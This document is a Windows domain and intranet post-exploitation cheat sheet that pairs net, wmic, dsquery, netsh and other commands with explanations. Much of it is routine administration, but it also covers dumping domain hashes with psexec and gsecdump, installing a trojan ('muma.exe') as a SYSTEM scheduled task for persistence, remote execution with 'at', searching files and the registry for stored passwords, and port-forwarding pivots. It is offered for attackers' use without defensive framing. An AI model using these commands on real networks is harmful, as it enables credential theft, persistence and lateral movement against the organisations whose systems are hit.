1. Common domain operation commands:
net group /domain
Get a list of all domain user groups
net group qq_group /domain
Display the members of the qq_group group in the domain
net group qq_group /del /domain
Delete the qq_group group from the domain
net group qq_group qq /del /domain
Remove the user qq from the qq_group group in the domain
net group qq_group /add /domain
Create the qq_group group in the domain
net group "domain admins" /domain
Get a list of domain administrators
net group "enterprise admins" /domain
Get a list of enterprise administrators
net localgroup administrators /domain
Get the members of the domain's built-in Administrators group (includes Enterprise Admins and Domain Admins)
net group "domain controllers" /domain
Get a list of domain controllers
net group "domain computers" /domain
Get a list of all domain member computers
net user /domain
Get a list of all domain users
net user someuser /domain
Get the details of the specified account someuser
net accounts /domain
Get the domain password policy: minimum password length, lockout threshold, and so on
net view /domain
List the domains visible on the network
net view /domain:testdomain
View the list of computers in the testdomain domain
nltest /domain_trusts
Obtain domain trust information
net user domain-admin /domain
Check the account's last logon time, password expiry time, logon script, group membership, and other details
net config Workstation
Query which domain the machine belongs to
net time /domain
Query the time on the primary domain controller
echo %logonserver%
Show the name of the domain controller that authenticated the current logon
net time \\192.168.1.1
Query the time of the remote shared host 192.168.1.1
net use \\IP\ipc$ password /user:username@domain
Establish an IPC$ connection to a host in the domain
net view \\dc2.backlion.com
View the shares on the domain controller
dir \\dc2.backlion.com\SYSVOL /s /a > sysvol.txt
Recursively list the contents of the SYSVOL share and save the listing to sysvol.txt
xcopy \\dc2.backlion.com\sysvol.txt sysvol.txt /i /c
Copy the listing file from the domain controller to the local computer
net user /domain bk bk123
Change the password of the domain user bk to bk123; requires domain administrator permissions
net localgroup administrators SEZKL\backlion /add
Add the user backlion from the SEZKL domain to the local administrators group
mstsc /admin
Connect to the console session over Remote Desktop; this works around the problem that the hash cannot be captured
gpupdate /force
Force an update of the domain group policy
psexec \\192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u
Export the hash values from the domain server's password store, windows\ntds\ntds.dit
gsecdump -a
Get the hash of the logged-on domain administrator; here gsecdump is the third-party tool that exports the AD domain hashes
tasklist /S ip /U domain\username /P /V
List the processes running on the remote computer
2. Basic Intranet Infiltration Commands:
ipconfig /all
View the full IP configuration
ipconfig /release
Release address
ipconfig /renew
Reobtain the IP address
whoami
Show the current account
whoami /all
Show the current account's SID, group memberships, and privileges
systeminfo
Query system and patch information
tasklist /svc
List processes together with the services each one hosts
taskkill /im <process name> (e.g. cmd.exe)
End a process by image name
taskkill /pid <PID> /t /f
End a process by PID; /t also ends its child processes, /f forces termination
wmic qfe get hotfixid
List the IDs of installed patches; useful for checking which patches are present
wmic qfe list full /format:htable > hotfixes.htm
Export detailed patch information to an HTML table
wmic qfe
Query patch information, including the Microsoft knowledge-base download link
ping <hostname>
Resolve a host name and display its IP address
net start
View the services that are currently running
net user
List local user accounts
net localgroup administrators
List the members of the local Administrators group
net session
List the sessions currently open with this computer
net share
List the SMB shares and the local paths they point to
wmic share get name,path
Same information via WMI: share names and their paths
wmic nteventlog get path,filename,writeable
Query the storage location of system log files
net use \\IP\ipc$ password /user:username
Establish an IPC$ session (workgroup mode)
net use z: \\192.168.1.1
Map a remote share to the local Z: drive (a share name follows the host in a complete command)
net time \\172.16.16.2
Query the current time on the remote host 172.16.16.2
at \\172.16.16.2 13:50 c:\windows\2009.exe
Schedule c:\windows\2009.exe to run on the remote host at 13:50
netstat -ano
List listening ports and connections with the owning process IDs
netstat -an | find "3389"
Check whether port 3389 is in use
net accounts
Review the local password policy
nbtstat -A ip
NetBIOS name query by IP address
net view
List the machines visible on the network; gives a list of currently active machines, but returns nothing if NetBIOS is disabled
echo %PROCESSOR_ARCHITECTURE%
Check if the system is 32 or 64 bits
set
View the system environment setting variables
wmic service list brief
List services (brief)
wmic process list brief
View the process
wmic startup list brief
View the startup program information
wmic product list brief
List installed software and versions (clues to vulnerable software)
wmic startup list full
Identify the program that starts at boot
qwinsta
List the logon sessions on this host
schtasks.exe /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "c:/muma.exe" /ED 2017/4/7
Add a scheduled task
REG query HKCU /v "pwd" /s
Search HKCU for saved values named pwd (passwords stored in the registry)
3. Common intranet network commands:
tracert IP
Traceroute
route print
Print the routing table
arp -a
List the ARP cache, which shows recently active IP addresses on the local subnet
arp -s <IP> <MAC>
Add a static ARP entry binding the IP address to the MAC address
arp -d <IP>
Delete the ARP entry for the IP address
nbtscan -r 192.168.16.0/24
Scan the whole subnet with the small tool nbtscan
netsh firewall show config
Review the firewall policy
netsh firewall show state
Review the firewall state
for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i "ttl"
Ping sweep: find the live hosts on the intranet in one batch
Windows comes with port forwarding:
netsh interface ipv6 install
Install IPv6 first (on XP and 2003, IPv6 must be installed, otherwise portproxy forwarding is unavailable!)
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=22 connectaddress=1.1.1.1 connectport=22
Forward local port 22 to port 22 of 1.1.1.1
netsh interface portproxy add v4tov4 listenaddress=192.168.193.1 listenport=22 connectaddress=8.8.8.8 connectport=22
netsh interface portproxy add v4tov4 listenaddress=192.168.193.1 listenport=22 connectaddress=www.baidu.com connectport=22
Listen on 192.168.193.1:22 and forward to port 22 of the given address or host name
netsh interface portproxy show all
View the forwarding configuration
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=22
Delete the forwarding rule
netsh firewall set portopening protocol=tcp port=22 name=Forward mode=enable scope=all profile=all
Add a firewall rule allowing inbound connections on port 22
4. Sensitive data and directories:
dir /b /s config.*
Recursively list all files named config.* under the current directory
findstr /si password *.xml *.ini *.txt
Search .xml, .ini and .txt files for the keyword password (case-insensitive, recursive)
findstr /si login *.xml *.ini *.txt
Search .xml, .ini and .txt files for the keyword login
Creating files with copy con:
copy con ftp.bat
Create the batch file ftp.bat: type the commands it should contain (such as ifconfig), then press Ctrl+Z to finish; the file is created
copy con test.vbs
Create the script test.vbs: type the script, then press Ctrl+Z to finish; the script is created
5. dsquery AD query tool:
dsquery user domainroot -limit 65535 && net user /domain
Lists all usernames in the domain
dsquery server -domain super.com | dsget server -dnsname -site
Search all domain controllers within the domain and display their DNS hostnames and site names
dsquery contact
List the contacts in the directory
dsquery subnet
List the subnets defined in the domain
query user
Query which users are online
dsquery group && net group /domain
List the groups in the domain
dsquery ou
List the organizational units in the domain
dsquery server && net time /domain
List the domain controllers in the domain
dsquery site -o rdn
List the names of all sites in the domain
dsquery group dc=super,dc=com | more
List all groups in the domain DC=super,DC=com
psloggedon.exe
Query which users are logged on to the host
netsess.exe \\192.168.1.115
Query the session host names and users on the remote host; does not require administrator privileges
reg query "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\TERMINAL SERVER CLIENT\DEFAULT"
Get the record of the most recent MSTSC (Remote Desktop) connections
6. Common DOS shortcut commands:
mspaint Paint
calc Calculator
notepad Notepad
taskmgr Task Manager
osk On-screen keyboard
gpedit.msc Group Policy Editor
services.msc Local services
compmgmt.msc Computer Management
devmgmt.msc Device Manager
winver Show the Windows version
magnify Magnifier
eventvwr Event Viewer
regedit Registry Editor
resmon Resource Monitor
wmic bios get releasedate Show the BIOS release date (computer manufacture date)
mstsc -f Remote Desktop connection (full screen)